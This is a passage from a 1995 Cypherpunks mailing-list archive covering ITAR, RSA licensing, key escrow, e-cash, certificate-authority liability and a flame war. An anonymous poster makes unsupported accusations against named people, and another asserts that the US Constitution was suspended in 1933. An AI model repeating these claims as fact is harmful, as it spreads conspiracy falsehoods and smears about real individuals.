wNvsKWrEW2aCK+lf1fvNUypLwXN5twA9W1ZLqVOqpJZMjLSVnoo9ulTOJ45hoF2p BZQGAaFqlnl6IQHbmA7l2vBt55GfWAnS =lDmq -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * From MMac102754 at aol.com Sat Sep 9 14:05:01 1995 From: MMac102754 at aol.com (MMac102754 at aol.com) Date: Sat, 9 Sep 95 14:05:01 PDT Subject: Sigh Re: not a flame please read and think about this Message-ID: <950909170449_15035342@mail04.mail.aol.com> Mr anon, if you want to flame, sign your name. M MacLeish = MMac102754 at aol.com From joelm at eskimo.com Sat Sep 9 22:11:02 1995 From: joelm at eskimo.com (Joel McNamara) Date: Sat, 9 Sep 95 22:11:02 PDT Subject: Bizdos citizenship? Message-ID: <199509100434.VAA10595@mail.eskimo.com> In correspondence with someone outside the US regarding ITAR regulations, the remark was made that Jim Bizdos was Greek and not a U.S. citizen. Is this statement in the same class as an Elvis sighting? Or if it is true, what impact would ITAR have on foreign nationals working for a US company involved with export restricted crypto? Please don't get carried away and turn this into a Net rumor. I'm just curious if anyone on the list can confirm or deny the citizenship comment. Joel McNamara joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key Thomas Jefferson used strong crypto, shouldn't you? From mnorton at cavern.uark.edu Sat Sep 9 22:11:18 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Sat, 9 Sep 95 22:11:18 PDT Subject: Scientology/Wollersheim as test case for key disclosure In-Reply-To: Message-ID: For some reason I think it was French, but I don't have a citation either. But I think you're right. MacN On Sat, 9 Sep 1995, Michael Froomkin wrote: > Ah. but if there is no plaintext, the question is whether you comply > with the rule by providing the encrypted text rather than plaintext. I > would say you have to provide the plaintext in the absence of a legitimate > privilege claim, but I don't recall a case to this effect (there is > precedent for requiring translation of foreign language documents when > the request is covered by an evidence conention; I don't recall if there > are any such cases that fall purely under domestic US rules). Anyone have > chapter and verse? > > > A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) > Associate Professor of Law | mfroomki at umiami.ir.miami.edu > U. Miami School of Law | > P.O. Box 248087 | It's hot here. And humid. > Coral Gables, FL 33124 USA | > See (soon to move to its real home): http://www.law.miami.edu/~mfroomki > > From anon-remailer at utopia.hacktic.nl Sat Sep 9 22:13:09 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Sat, 9 Sep 95 22:13:09 PDT Subject: not a flame please read and think about this Message-ID: <199509100245.EAA09943@utopia.hacktic.nl> i know this is unpopular but i wish someone would respond the the points rather than flaming me. pat farrel is the only one of you with the balz to try to defend himself insead of attacking me. and you attack me for being anon. i love it. cypherpunks yea right. more of the indefensible. ive been keeping a list: janet renos cypherpunk heros: wei dai patents algorithms - for microsoft!!!!. that should fucking help us a lot. whos he gonna sue first? hey i think ill patent xor!!!! and give the patent to the nsa!!! according to sci.crypt mat blaze can prove that clipper has no back door. right. that sure helps us. david sternlights new hero. pat farrel signs up with the nsa to make the key escrow rules easier for us morons to understand. hey thanks. maybe theyll give you a nicer room in the concentration kamp. a whole shitload of socalled cypherpunks jumping over each other to help and defend him. brian davis trys to convinice us that key escrow isnt so bad (who signs your paycheck davie?????) that guy from rand corp tells us words of wisdom from robert morris the nsa guy as if we should write them down and pray three times a day to them. carl elison designs key escrow for tis and acts like hes one of us. bruce schneier is copyrighting crypt programs and threatining to sue people who use it. even phil zimmerman is selling the rights to pgp. what about all the people who contributed code (like me). not a dime for us because phil is famous and your not alowed to say anythingn bad about him. sorry i forgot phil is god. no one dares to complain. ask phil about me and when i asked about sharing profits from the code i conrtibuted. also about the deal with r.f... by the way i am not the anonymous-remailer at shell.portal.com person who toold farel to shut up. that was someone else. i dont think anyone should shut up. thats my point. i think we should talk about this in the open. got it perry??? lets get back to being punks. fuck these traitors. do crypto and fuck the nsa. an116512 at anon.penet.fi From dsc at swcp.com Sat Sep 9 22:13:50 1995 From: dsc at swcp.com (Dar Scott) Date: Sat, 9 Sep 95 22:13:50 PDT Subject: Scientology/Wollersheim as test case for key disclosure Message-ID: Phill wrote, >One solution to this problem would be to modify PGP so that the session >key for >the document was released rather than the passphrase for the public key. The >former would provide only read access, the latter would allow th >scientologists >to forge Wollerstein's signature on other material. In addition many of the >documents may be subject to privillege. It seems to me that if this kind of risk was seen ahead of time that a method doing the equivalent using ordinary PGP commands could be agreed upon by all involved. The document could be encrypted using "PGP conventional encryption" and the pass phrase for that could then encrypted using the public key. The encrypted document would thus consist of these two parts. The breaking of the traditional decryption into it's two parts would not be needed--superficial use of PGP would work. The owner of the public key--who is in possession of the document encrypted as suggested--when threated by an attacker--who is also in possession of the document--with an unbearably high cost for not giving up his secret key can offer to give up the the password for the "PGP conventional encryption". This method does not define how the password is obtained and that might be a weakness. I confess I'm new to PGP (and this subject in general) and am ignoring the suggestion in Tim May's FAQ that newbies try not to look clueless. Dar Scott =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From adam at lighthouse.homeport.org Sat Sep 9 22:15:47 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Sat, 9 Sep 95 22:15:47 PDT Subject: RSA licensing costs? Message-ID: <199509100038.UAA06872@homeport.org> Does anyone know how much RSA wants per desktop in a large client application? Using the BSAFE dereived licenses would be fine for this. (We're looking at 2-10k licenses for a nameless financial institution, doing those things that RSA likes. :) Adam -- "It is seldom that liberty of any kind is lost all at once." -- Hume From seawolf at challenger.atc.fhda.edu Sat Sep 9 22:18:38 1995 From: seawolf at challenger.atc.fhda.edu (Sameer R Manek) Date: Sat, 9 Sep 95 22:18:38 PDT Subject: Sigh Re: not a flame please read and think about this In-Reply-To: <53877.pfarrell@netcom.com> Message-ID: I think we can end this childish flaming. I hope both Pat and na116512 are mature enough enough not to respond to this post and if they want to make sure they keep the mailing list out of this. If you both want to flame each other take it to private email and flame away. From scs at lokkur.dexter.mi.us Sat Sep 9 22:22:21 1995 From: scs at lokkur.dexter.mi.us (Steve Simmons) Date: Sat, 9 Sep 95 22:22:21 PDT Subject: Sigh Re: not a flame please read and think about this In-Reply-To: <199509092006.NAA05181@jobe.shell.portal.com> Message-ID: <1995Sep9.230847.16371@lokkur.dexter.mi.us> anonymous-remailer at shell.portal.com writes: >Then shut up. [[ drivel excised ]] >Then shut up. Please do us the favor of using a killfile-able name in the future. -- "Captain Kirk and I both want the same thing: the whole-hearted devotion of a naive alien. And if certain things stand in our way -- Klingons for Kirk, reality for me -- well, we just have to suck in our guts, set the phasers on Stun, and hope for the best." Ian Schoales (Merle Kessler) From mfroomki at umiami.ir.miami.edu Sat Sep 9 22:31:29 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Sat, 9 Sep 95 22:31:29 PDT Subject: Brand e-cash implementation? Message-ID: Have there been any implementations, even as trials, of Brands' protocols? Do any ecash systems on the drawing board even include real user anonymity? A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (soon to move to its real home): http://www.law.miami.edu/~mfroomki From mfroomki at umiami.ir.miami.edu Sat Sep 9 22:33:22 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Sat, 9 Sep 95 22:33:22 PDT Subject: Dishonest banks & ecash Message-ID: I've been doing some ecash reading. The threat model is the dishonest user or 3rd party who tries to mint the stuff. Any work been done on the problem of the dishonest bank (a la Bcci) that tries to mint the stuff? A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (soon to move to its real home): http://www.law.miami.edu/~mfroomki From starrd at iia2.org Sat Sep 9 22:39:24 1995 From: starrd at iia2.org (starrd) Date: Sat, 9 Sep 95 22:39:24 PDT Subject: Bizdos citizenship? In-Reply-To: <199509100434.VAA10595@mail.eskimo.com> Message-ID: On Sat, 9 Sep 1995, Joel McNamara wrote: > Date: Sat, 09 Sep 1995 21:34:11 -0700 > From: Joel McNamara > To: cypherpunks at toad.com > Subject: Bizdos citizenship? > > In correspondence with someone outside the US regarding ITAR regulations, the remark was made that Jim Bizdos was Greek and not a U.S. citizen. Is this statement in the same class as an Elvis sighting? Or if it is true, what impact would ITAR have on foreign nationals working for a US company involved with export restricted crypto? > > Please don't get carried away and turn this into a Net rumor. I'm just curious if anyone on the list can confirm or deny the citizenship comment. > > Joel McNamara > joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key > Thomas Jefferson used strong crypto, shouldn't you? > You should consciously be aware that the U.S. Government *will* break it's own laws to further it's goals. You should know that such as law as "this shall be the law unless the fuhrher disagrees andf then what the furhrer says shall be the new law" [yes, such a law was in Nazi Germany's lawbooks] in the states we call it "Executive Order" and with the U.S. beiong one of the most powerful outlaw governments on this planet, you should watch them anyway. Dont count on your citizenship or location outside of the US as protecting you. If they want you, you are dead-meat. You know it too! BTW, if you are going to say 'well the US has a Constitutioon, we'll we *dont* it was suspended in 1933... ||||||||||||email address: starrd at iia2.org or starrd at cinenet.net||||||||||| | Creator of the original | Get paid to upload | | Patriot's Archives \ shareware to BBSes and | | ftp: iia.org /pub/users/patriot \_____ the Internet! | | ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\ Get file: | | For index of available files: descript.ion \ uploader.zip | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP 7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf 9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig= =0Tlq -----END PGP PUBLIC KEY BLOCK----- From greg at ideath.goldenbear.com Sun Sep 10 00:07:21 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Sun, 10 Sep 95 00:07:21 PDT Subject: Internet commerce mtg, Denver Message-ID: <199509100705.AA22815@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- L. Detweiler's tentacle Vlad Nuri writes: > [...] > the rep told me something interesting: he said that every > Bell phone book is actually "seeded" with dummy names > so they can detect copyright infringers. if you come out > with a business directory, these Bells will just scan for > the fake names that they have inserted into their own listings. > if they find them, supposedly they can show them to a copyright > judge and he will immediately close down your operation and > fine you, almost no questions asked. I didn't know how much > of this really happens (the legal stuff sounded questionable > to me) but it is an interesting "real world" instance of > copyright terrorism prevention that the "information liberation > front" would have to contend with. While he's correct that publishers of data compilations do use dummy entries to track [mis]use of their data, he's incorrect when he asserts that it's possible to get a copyright on an ordinary white-pages style directory. (_Feist v. Rural Telephone_, 499 US 340 (1991), http://www.law.cornell.edu/supct/classics/499_340v.htm ). This practice occurs when mailing lists are sold, and in the drafting of maps (non-existent streets or sections of streets may be added, or changed in an unremarkable way). It's also possible (and getting easier with laser printers, etc) to generate apparently indentical but distinguishable documents for use where disclosure of the documents is controlled; the distinguishing parts (perhaps a misspelled word or other apparent typo, or a change in line spacing between paragraphs, or altered line breaks) can then be used to trace a recovered "leaked" document to the person who received it originally. Where the documents are digital (or digitizable), two or recipients could collude to 'diff' their copies, and find the barium data; but a savvy document-distributor could generate copies with multiple ID-bits, such that any two copies might have differences between the two, but barium data that's the same yet different from the other participants. So those two colluders round up a third recipient [...] It's basically a form of very-low-bandwidth text-only steganography. Of course, we're wandering into FAQ territory; isn't there something in the Cyphernomicon about digital signatures for physical items being used as proof of source? (e.g., you'll know that the expensive motorcycle part you just bought really *is* from Harley-Davidson, not a cheaper part placed in a knockoff Harley box) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFIOtX3YhjZY3fMNAQGlwAP+KhhBK1MGDvsNizH5Pu7XsqQg6rPxnCp2 q5YRZrQyVktit8hK+TbHcodAvG7IWK2vFuI1y80dFx5sKfAqjLU81rth7Pad7nRm USUYUIxlvnaO7dOWUPMsEaaad2uZpLn/ALoTwXsYqzT2YjPyl1/YYLTHkmK/PHUI 5C6yJNKtpAY= =CwZF -----END PGP SIGNATURE----- From AlanPugh at MAILSRV2.PCY.MCI.NET Sun Sep 10 01:54:29 1995 From: AlanPugh at MAILSRV2.PCY.MCI.NET (Alan Pugh) Date: Sun, 10 Sep 95 01:54:29 PDT Subject: Certificates/Anonymity/Policy/True Names Message-ID: <01HV3KI1816A8ZH61F@MAILSRV1.PCY.MCI.NET> > What about when the CA signing key is stolen, factored, or otherwise falls > into the wrong hands, thereby possibly making every signature made by the CA > worthless, or at least questionable? > > I assume liability will be based on the CA's efforts to ensure the integrity > of the signatures it makes (and therefore the confidentiality of the secret > key components), but what constitutes due diligence? As we all know, > security measures cover a very wide range and can reach ridiculous > proportions on both ends of the spectrum... How much security will be > 'enough' from a legal standpoint...? an excellent point, and one that i'd not seriously considered until i saw your post. given today's legal climate, assuring the confidentiality of a ca's key would be pretty expensive. i suppose burning cd-roms with all transactions would help to document all transactions, but would not be definitive as far as the signatures go. any document signed with the key would really have to be considered valid if the signature itself is to really mean anything in a legal sense. if one were to allege that a signature is not valid, even though it checked out cryptologically, how could one defend against a charge that the secret key had been compromised. you cannot prove a negative. obviously, ianal, but i would think it would be reasonably easy to convince at least one jury member that there is a reasonable dought that the key had been compromised. then again, it might be similar to a claim that a signature has been forged. i think there could be a danger of allowing the confidence in a given piece of crypto to unduly influence a jury of a document's authenticity when the key _had_ been compromised. the 'gee wiz' factor could be fairly significant among juries. given statements like 'you could take all the computers on the planet and let them crunch on it for a billion years would be needed', a jury might miss issues of security. fwiw, my 2 cents... ********************************************* * / Only God can see the whole * * O[%\%\%{<>===========================- * * \ Mandlebrot Set at Once! * * amp * * <0003701548 at mcimail.com> * * * ********************************************* Key fingerprint = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D From anonymous-remailer at shell.portal.com Sun Sep 10 02:10:05 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 10 Sep 95 02:10:05 PDT Subject: PGP in UK Message-ID: <199509100908.CAA23542@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- I heard something rather disturbing the other day from someone I do business with. I've been telling this company for 18 months or so about the advantages of PGP and email rather than faxes, and they finally tried it, liked it, and decided to use it a month or so ago. Last week they got a visit from the Department of Trade of Industry and MI5 (or is it MI6?) telling them to stop using PGP or they might find difficulties getting export licences for their products in future. The visitors wouldn't say how they knew this company had been using it. The person who told me about this also said something about a Department of Trade & Industry paper which mentioned that the British Government was going to insist on key escrow for encryption. I had hoped to get a copy of this, but he can't find it at the moment. I'll post the text when I get it if anyone's interested. Anyone else in the UK heard anything about this? - -- B. -----BEGIN PGP SIGNATURE----- Version: 2.6.i iQEVAgUBMFGPfeHVHXeXphJJAQFJ0Af/Svh0ifULgpEuauSBPFreDDJoa/a1gcPe ya3CjOde9kVuN0IkBHFubO18MrAO6WbwlhVa/X/pjG4vbSahonpzmgHHfkVW20Gh qlhBwFLElTmOgspSjHJ74sYNUM2YZ+AKOyNwW4ix6woJ0WL0NP+cV8CZv4tdEH4l EI3/FuoFccbkKMk7QYoRPOyj5FI4GiFxVsg1GFOU3r83bxfJDfU2yZdImEBx/Nlc gteizqFTF/QiKckl6f5NzCBzaoIcMw0VLN8dAGLqzDycJtFqGdOPgvgSt1LwXKBs +zJM5Z/laubYm5SiEPy4oVz9N3lT4EOzEtdMEoiSC6IiSDSaURkEAA== =GiY0 -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.i mQENAi8KzVoAAAEH/2gPfD2Xdw1nDAXtMH/F5iCMrwdXHXolEfOjRP59QP1Yodhb L+NGSNls67+H1us5PP5EpHDbHRy66ExgRK7XdZ/2qz0SsbTG+R6pRIILmMfgd3Nj M6uq1DehdxWPdp4PMC9LNrG2V9QrRGPgpHhr3iDfy+p6JTjW8XCYUXn5POt0wBs2 n/vlowjLf9dVYwUKP58V9gokNsFlGcB08gEbxKa9Y2X7zB3BAlywPVdKVh+BOTCK z1Sofx9Wup0MEXEDEESLDSq/634hzzVx6Kt54cZBbi5nAdPHWlGHZl5vU93A3jPE fh59JXsCZmWKLXMjZtjcIJYkC4hC4dUdd5emEkkABRG0DEIuIERlIExhIFBheokB FQIFEC8g7yzh1R13l6YSSQEBD+4H/ir8R4iw1tWLUuxz6etmV99OhMUYoI5lQnxz 9KARQf4eD3xHPoMw6tHLKOUR8xYS9i2RmkhJrPRzCfD5OKSOBEHuIQEt/+dcbCuw 0fxn9NrU7NjFWwWKQ+0jYikN3hfIWcPmGtyhQ0KSrGfUDo5+rJr5Cy4U6eOooepv gYniecNNVAzQ2KDiWTOZ5zqG3zBAYj6uw8LHvBR1qol2YcJ4s02c4GdAZmzEq49s nDBortKfWUAxZkESBt2tMx8gYq6b38evYJBLXOqEN5Lt/5zf0nG1u0BEWBLaCj55 y8lh1KolVOu808tX9blOrjqwEB12vngjXzf7hHWohrGrrQVT2N4= =5qEt -----END PGP PUBLIC KEY BLOCK----- From AlanPugh at MAILSRV2.PCY.MCI.NET Sun Sep 10 02:14:20 1995 From: AlanPugh at MAILSRV2.PCY.MCI.NET (Alan Pugh) Date: Sun, 10 Sep 95 02:14:20 PDT Subject: remailers Message-ID: <01HV3L6O9GWI8ZH626@MAILSRV1.PCY.MCI.NET> where can i find a good 'how to' faq on anonymous remailers? i've looked around and found several documents that tell me what they are, but no good information on how to use the various remailers. pointers are appreciated. ********************************************* * / Only God can see the whole * * O[%\%\%{<>===========================- * * \ Mandlebrot Set at Once! * * amp * * <0003701548 at mcimail.com> * * * ********************************************* Key fingerprint = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D From jya at pipeline.com Sun Sep 10 07:14:46 1995 From: jya at pipeline.com (John Young) Date: Sun, 10 Sep 95 07:14:46 PDT Subject: PGP in UK and GAK Message-ID: <199509101414.KAA09600@pipe4.nyc.pipeline.com> Responding to msg by anonymous-remailer at shell.portal.com () on Sun, 10 Sep 2:8 AM [Snip] >The person who told me about this also said something >about a Department of Trade & Industry paper which >mentioned that the British Government was going to >insist on key escrow for encryption. > >Anyone else in the UK heard anything about this? Picking up the possible mandated use of key escrow in the UK: There was chat at the NIST key escrow meeting that low-bit key escrow may be the global policy in the works among governments. With a blanket outlawing of all non-escrowed systems. And, that US key escrow and 64-bit export policy is a harbinger of domestic regulation. A fed at the B-2 breakout session imperiously barked the mantra chanted by several feds at the general meeting, "64- bit encryption is what industry asked for, why are you now complaining." To the counter-question, "what industry are you referring to?" the answer was always just "industry." The USG's latest key escrow policy, the NIST meetings and the Intellectual Cryptography Insitute's conference "Global Challenges" posted here may be the surfacing of a well- orchestrated government and "industry" collusion on this issue. Note the common ever-present attendees of both NIST and the ICI meetings. Certainly, some "industry" spokespersons like "Daughter of Clipper" Denning presume by their tone of writing that key escrow is on its way to supremacy, with only quibbling left on the criteria for acceptably "competitive" variations. The NIST handouts of industry players seem to bear this out as well, even as some join the public kibitzing. Perhaps their raz, and that of BSA, is just a diverting smokescreen to induce complacency -- or squeaking wheels to get USG attention for sweetheart contracts. Maybe they've already met privately with USG reps to get rewarded with a piece of the PGP/non-escrow clamp-down biz -- more venerable suckling of national security kabooty as advised by smart-varmints like ex-NSA Mr. Stewart Abercrombie Baker, Every-meet-attending-Esq. I wonder if Mrs. Denning and Mr. Baker are advising their sweating crypto clients, "if you can't beat 'em, join 'em, the international escrow train is leaving the station, better get on before it's too late." While fretting of derailment by hackers, or worse, by international security agencies paranoid of gov-biz complicity to take over the "if you knew what I knew" crypto-protected cornucopia. Wonder who's really engineering this GAK Limited runaway? Does anybody know David Kahn well enough to ask what he's finding as NSA Visiting Historian -- in the archives and in the job-insecure-spook resumes heat-seeking crypto fires? From thad at hammerhead.com Sun Sep 10 07:52:10 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Sun, 10 Sep 95 07:52:10 PDT Subject: RSA lcensing costs? Message-ID: <199509101443.HAA04907@hammerhead.com> Adam, I called RSA last week to get information on licensing Diffie-Hellmann for an videoconferencing application. They said that "They provide the BSAFE development toolkit, but don't license the technology" and gave me the number of PKP to license the technology itself. I called a Mr. Fougmer at PKP, (408 735-5893), his message says that he'll be out of town until the 18th of September, and if you want to leave a message, call back after that date. Now, I could be completely confused, it wouldn't be the first (or even the 100th) time. If you can get a standard license by using the BSAFE toolkit, and they had a standard price for that, well, I didn't give Linda De Los Reyes at RSA (415 595-8782) a chance to tell me that. thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-8624 From thad at hammerhead.com Sun Sep 10 08:12:45 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Sun, 10 Sep 95 08:12:45 PDT Subject: 64 bit crypto Message-ID: <199509101504.IAA04932@hammerhead.com> Say that we wanted to use 80 bit RC4 for our crypto application, but we were only allowed to use 64 bit crypto because we lived in some police state that enforced its wishes. Couldn't we modify RC4 easily to provide the same security against brute-force attacks by just running the key-setup phase 65536 times instead of just once? That would slow down the key-setup (on my machine) from 50,000 per second to just over 1 second, but so what? It takes ATT more than 1 second to set up a long distance call, I can wait another second to start the conversation. If our breaking of 40 bit RC4 was a one, then this 64 bit RC4-modified would be a 109,951,162,776, well beyond possibilities that I can imagine. You might say that you could save all 2^64 key tables, but that is a huge amount of data, millions of terabyte-capacity tapes. In the GAK proceedings, I have never heard of any limitation on the algorithm, just that it be public and 64 bits or less. And, of course, have GAK. Of course, it wouldn't surprise me for this kind of technical fix to be immediately outlawed by the aforementioned police state. thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-8624 From bdavis at thepoint.net Sun Sep 10 08:52:33 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 10 Sep 95 08:52:33 PDT Subject: If this thread didn't start with a flame then I'm ... In-Reply-To: <199509100245.EAA09943@utopia.hacktic.nl> Message-ID: On Sun, 10 Sep 1995, Anonymous wrote: > > i know this is unpopular but i wish someone would respond the the points > rather than flaming me. pat farrel is the only one of you with the balz > to try to defend himself insead of attacking me. and you attack me for > being anon. i love it. cypherpunks yea right. > ... > > brian davis trys to convinice us that key escrow isnt so bad (who signs your paycheck davie?????) > > an116512 at anon.penet.fi > An: You flamed me several months ago, essentially for being a govt flunky in the boonies. You didn't respond to my last post on the topic ... Many of us (apparently) have trouble with flames orginating from "the great and powerful Oz" who may be, in fact, a nonacheiver hiding behind a curtain. I guess we need Toto to pull away your curtain of privacy! If you don't diverse viewpoints, either persuade this list's owner to change his charter or start your own list. Then maybe *I'll* start posting anonymously. You also misread the purpose of my post re MKE. The purpose was for me to get a sense whether some number of Cypherpunks might agree to some form of MKE (i.e. would some kind of protection that the government might accept, also be acceptable to most/some on the list). I received a number of thoughtful and thought provoking replies. I was expecting your flame, but I see you decided to use your blunderbus rater than a rifle. And you are, of course, correct. Make no attempt to understand your enemy. Stand your ground regardless. No tactical retreats, no overall strategy. Was this from Sun Tzu? EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame way! I get treated worse in person every day!! From perry at piermont.com Sun Sep 10 09:34:06 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 10 Sep 95 09:34:06 PDT Subject: Sigh Re: not a flame please read and think about this In-Reply-To: <199509092006.NAA05181@jobe.shell.portal.com> Message-ID: <199509101633.MAA11214@frankenstein.piermont.com> anonymous-imbecile at shell.portal.com writes, among other things: > Then shut up. Its wonderful to see lots of anonymous remailers, but sometimes one wonders at the people that use them. I can understand, though, why many people don't have the cojones to make themselves look like hydrocephalic jerks in public. Perry From tcmay at got.net Sun Sep 10 09:43:35 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 10 Sep 95 09:43:35 PDT Subject: Cypherpunks Purity Test Message-ID: It seems that none of us are "pure enough" for Anonymous. In the real world, and in the world of crypto experts, programmers, and legal folks, people have real jobs. Sometimes with Microsoft, sometimes with AT&T, sometimes with the Justice Department. To exclude them from our discussions because they are not pure enough and have not done as Anonymous has (who may actually be working for anyone, of course), is self-defeating. By working for Microsfoft, Justice, or TPC, they can probably do more for "the cause" (in its many dimensions and facets) than some warez-junkie living with his parents can. Specifically, At 2:45 AM 9/10/95, Anonymous wrote: >wei dai patents algorithms - for microsoft!!!!. that should >fucking help us a lot. whos he gonna sue first? Wei Dai's work is impressive...I'm not surprised Microsoft hired him for the summer. Patents are a way of life. They may not always be, and different people have different views on them, but meaningless insults like this are a waste of our time. >according to sci.crypt mat blaze can prove that clipper has no back >door. right. that sure helps us. david sternlights new hero. If Anonymous believes this claim by Sternlight, he didn't read the rest of the discussion and he knows as much about crypto as Sternlight does. Matt Blaze made a much more finely-nuanced point about this (I wasn't at the Crypto meeting, but read his comments in sci.crypt, and they directly dispute this point by Anonymous.) >pat farrel signs up with the nsa to make the key escrow rules easier >for us morons to understand. hey thanks. maybe theyll give you a >nicer room in the concentration kamp. Pat Farrell and several other members of our list attended the NIST key escrow meeting. I would have also if I lived near D.C. Is silence the only acceptable behavior at such meetings? Perhaps Anonymous feels that even _attending_ such a meeting is disgraceful? Most of us disagree. > >a whole shitload of socalled cypherpunks jumping over each other to help and >defend him. They "defended" him in the sense that they questioned the motives (and perhaps the emotional age) of Mr. Anonymous. We on this list have had a long interest in key escrow, dating back to the first weeks of this list's existence, and 6 months prior to the public disclosure of Clipper. Much discussion of key escrow in various forms (Clipper, SKE, CKE, GAK) has occurred, and even lists of changes/improvements have been made. >brian davis trys to convinice us that key escrow isnt so bad (who signs >your paycheck davie?????) > I recall Brian Davis asking a well-formed question about whether our objections to key escrow would be lessened under various circumstances. A perfectly reasonable thing to do. Several of us responded. What this list is for. >that guy from rand corp tells us words of wisdom from robert morris the nsa guy >as if we should write them down and pray three times a day to them. > ??? This one escapes me. Robert Morris Sr. has written many interesting things. That he worked for, or still works for, the NSA is no reason to ignore what he has said. Anonymous would probably be thrown into an apoplexy were he to learn that more than one current Cypherpunk actually worked for the NSA. >carl elison designs key escrow for tis and acts like hes one of us. > He _is_ one of us. His work on commercial key escrow (CKE) is not inherently bad. After all, there are many legitimate reasons people and corporations would _choose_ (emphasis on "choose") to split keys, store them with trusted agents, etc. CKE, if done right, may be the way many of us protect ourselves, from loss of keys in various circumstances. Even protect ourselves from having to give keys to others (imagine offshore CKE depositories which have instructions on under what circumstances they will comply....). I ask Anonymou, is it better that an active researcher and developer of CKE be on this list, or that we cast him out (as if we could) and continue in ignorance? >bruce schneier is copyrighting crypt programs and >threatining to sue people who use it. > Like it or not, copyrights and patents are the way things are now being done. It sometimes takes having a patent portfolio before one can "trade" with those having other patents. Longterm, this will likely change (crypto anarchy and all that), but for now.... I'm not going to defend software patents, but insults like this, for someone who has worked so hard on crypto education, are uncalled for. >even phil zimmerman is selling the rights to pgp. what about all the >people who contributed code (like me). not a dime for us because phil is >famous >and your not alowed to say anythingn bad about him. sorry i forgot phil is god. >no one dares to complain. ask phil about me and when i asked about sharing >profits from the code i conrtibuted. also about the deal with >r.f... Now we know that Anonymous is actually a plant from the One Worlders! Insulting Saint Phil is too much. >lets get back to being punks. fuck these traitors. do crypto and fuck the nsa. > Articulate words. Or, as Anonymous woud put it: "fuck this noyze. get back to hacking commodore 64 warez. crypto rulez, d00d!" Amazing what the cloak of Anonymity brings out in people. Almost enough for me to start to believe the doubters of anonymity, the skeptics. But, with good filtering (and especially with positive reputation filtering), no big deal to send Anonymous to the oblivion he so richly deserves. I've written a lot in my time on this list, and no doubt Anonymous will find many items he thinks prove I am working for the NSA, or Chobetsu, or am an agent for the Beast. So be it. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From rwm132 at psu.edu Sun Sep 10 09:50:26 1995 From: rwm132 at psu.edu (Ryan Matlock) Date: Sun, 10 Sep 95 09:50:26 PDT Subject: mailing list Message-ID: <199509101650.MAA46410@r02n06.cac.psu.edu> can you put me and Catch 22 on your mailing list? got any good philes philes? From perry at piermont.com Sun Sep 10 10:45:55 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 10 Sep 95 10:45:55 PDT Subject: Bizdos citizenship? In-Reply-To: <199509100434.VAA10595@mail.eskimo.com> Message-ID: <199509101745.NAA11319@frankenstein.piermont.com> Joel McNamara writes: > In correspondence with someone outside the US regarding ITAR > regulations, the remark was 